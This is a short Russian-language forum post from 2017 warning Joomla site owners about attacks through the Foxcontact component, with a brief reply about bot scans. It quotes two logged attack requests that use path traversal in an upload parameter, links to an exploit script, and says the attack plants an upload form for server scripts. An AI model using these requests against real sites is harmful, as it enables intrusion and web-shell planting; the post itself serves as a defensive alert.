@Rumpelstilzchen

Rumpelstilzchen

Румпельштильцхен
Rumpelstilzchen

Дата рождения: 21.01.1924

0 я читаю 31 меня читают
688 постов
2161 комментариев
Rumpelstilzchen
09 Oct 2017

А еще сейчас волна хакинга Джумлы через Foxcontact.
хакают так - "GET /components/com_foxcontact/lib/file-uploader.php?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 500 185 "-" "Mozilla/5.0"
(не работает, лол)
Или так - "GET /index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=2?cid=2&mid=2&qqfile=/../../../../by.htm HTTP/1.1" 200 491 "-" "Mozilla/5.0"
ссылочка на эксплойт - https://github.com/2inf3rna...ob/master/exploit.py
Проверьте себя. Загуржает в components/com_foxcontact/ файл _func.php - форму загрузки на сервер скриптов.
П.С. НЕ работает если загрузка аттачей в форме выключена.

09 Oct 2017

Да шит его дери, я сейчас смотрю логи - все пестрит 404, какие только php файлы там боты не ищут...

#ozppk/2 в ответ на /1

Добавить пост

Вы можете выбрать до 10 файлов общим размером не более 10 МБ.
Для форматирования текста используется Markdown.